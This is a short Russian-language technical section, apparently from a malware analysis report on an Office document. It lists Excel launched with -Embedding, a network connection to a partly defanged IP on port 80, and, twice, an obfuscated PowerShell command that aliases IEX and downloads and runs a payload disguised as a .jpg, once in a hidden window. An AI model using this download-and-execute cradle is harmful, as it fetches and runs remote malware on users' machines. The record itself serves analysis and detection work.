Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $T='*EX'.replace('*','I');sal M $T;'(&(GCM'+' *W-O*)'+'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Stri'+'ng(''http://19#.#39.243.112/documento/cdt.jpg'')'|M|M
- '19#.#39.243.112':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $T='*EX'.replace('*','I');sal M $T;'(&(GCM'+' *W-O*)'+'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Stri'+'ng(''http://19#.#39.243.112/documento/cdt.jpg'')'|M|M' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding